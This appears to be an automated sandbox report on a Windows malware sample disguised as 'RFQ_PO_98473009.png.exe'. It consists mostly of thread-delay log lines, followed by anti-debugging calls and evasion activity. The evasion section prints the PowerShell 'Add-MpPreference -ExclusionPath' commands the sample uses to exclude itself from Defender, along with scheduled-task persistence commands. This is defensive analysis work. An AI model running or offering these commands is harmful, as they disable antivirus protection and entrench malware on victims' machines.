                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -599875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -599764s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -599652s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -599531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -599422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -599309s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -599187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -599078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598968s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598859s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598202s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -598093s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597982s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597840s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597710s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597594s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597359s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597250s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -597031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596922s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596703s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596593s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596484s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596375s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596232s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -596000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -595015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -594906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -594797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -594672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -594562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -594452s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020 Thread sleep time: -594343s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe TID: 8096 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599546s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599436s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599327s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599219s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -599000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -598890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -598781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -598672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -598561s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000 Thread sleep time: -598453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598124s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597796s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597687s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597576s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597465s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597327s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597217s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597107s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596641s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596313s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596188s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596063s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595609s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595390s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594927s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594673s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594521s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594380s >= -30000s
                      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599764
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599652
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599309
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599187
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599078
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598968
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598859
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598750
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598640
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598421
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598202
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598093
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597982
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597840
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597710
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597594
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597469
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597359
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597250
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597140
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597031
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596922
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596812
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596703
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596593
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596484
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596375
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596232
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596109
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595890
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595781
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595562
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595453
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595343
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595234
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595125
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595015
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594906
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594797
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594562
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594452
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594343
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599765
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599656
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599546
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599436
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599327
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599219
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 599000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598890
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598781
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598561
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598453
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598343
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598234
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598124
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 598015
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597906
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597796
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597687
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597576
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597465
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597327
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597217
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597107
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 597000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596891
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596766
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596641
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596422
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596313
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596188
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 596063
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595953
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595844
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595719
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595609
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595500
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595390
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595281
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595172
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 595062
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594927
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594812
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594673
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594521
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Thread delayed: delay time: 594380
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1234608709.0000000007958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d_
                      Source: Native_New-Nova.exe, 0000000A.00000002.3618535161.0000000000757000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ$no
                      Source: svchost.exe, 0000000B.00000002.2872552456.000001DE5265A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2871213206.000001DE4D02B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: Native_snake01.exe, 0000000C.00000002.3617602087.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3617462119.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3617459567.00000000005CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe API call chain: ExitProcess graph end node graph_10-50622
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe API call chain: ExitProcess graph end node graph_12-128990
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_05DF0040 LdrInitializeThunk,LdrInitializeThunk,10_2_05DF0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_0040ADB0 GetProcessHeap,HeapFree,10_2_0040ADB0
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Code function: 9_2_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,9_2_00401475
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040E61C
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00416F6A
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_004123F1 SetUnhandledExceptionFilter,10_2_004123F1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0040E61C
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00416F6A
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_004123F1 SetUnhandledExceptionFilter,12_2_004123F1
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Memory written: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Memory written: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Process created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
